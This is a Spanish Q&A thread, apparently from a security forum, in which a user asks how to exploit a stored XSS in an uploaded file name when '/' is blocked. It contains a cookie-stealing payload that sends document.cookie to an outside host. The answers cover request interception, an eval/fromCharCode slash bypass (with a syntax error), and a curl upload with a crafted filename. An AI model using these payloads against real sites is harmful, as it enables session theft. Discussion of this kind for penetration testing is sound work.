Explotación de XSS en el nombre de archivo sin usar /

2

Estoy intentando explotar una vulnerabilidad en el campo de nombre de archivo de una carga de archivo. La aplicación web no valida correctamente el nombre de archivo del archivo cargado y, como resultado, existe una vulnerabilidad almacenada de secuencias de comandos entre sitios.

Mi problema es que cada vez que intento cambiar el nombre del archivo para incluir algo como la carga útil a continuación, no puedo incluir / en el nombre del archivo.

document.location='http://my_test_server.com/bla.php?cookie='+document.cookie;

¿Alguna idea / carga útil? ¿Es posible explotar esta vulnerabilidad?

    
pregunta User1911 19.04.2018 - 20:40
fuente

3 respuestas

0

Debe usar una aplicación de intercepción de paquetes y editar el paquete enviado. Así que reemplaza el / por digamos un _ en el nombre del archivo, luego interceptas el paquete y lo cambias de nuevo en el encabezado.

    
respondido por el Peter Harmann 19.04.2018 - 20:46
fuente
1

Puede ejecutar cualquier JavaScript sin usar / usando una combinación de eval y fromCharCode :

let slash = var String.fromCharCode(47);
eval("document.location='http:" + slash + slash + "my_test_server.com" + slash + "bla.php?cookie='+document.cookie;"); 
    
respondido por el Anders 19.04.2018 - 21:26
fuente
0

Puedes cambiar el nombre del archivo al subir con curl :

curl -X POST http://example.com -F "file_input_name=@testfile;filename=document.location='http://example.com'"

Sin embargo, cuando probé esto con PHP, eliminó todo automáticamente antes del último / , asumiendo que se había enviado la ruta completa y convirtiéndola en el nombre base.

    
respondido por el AndrolGenhald 19.04.2018 - 22:03
fuente

Lea otras preguntas en las etiquetas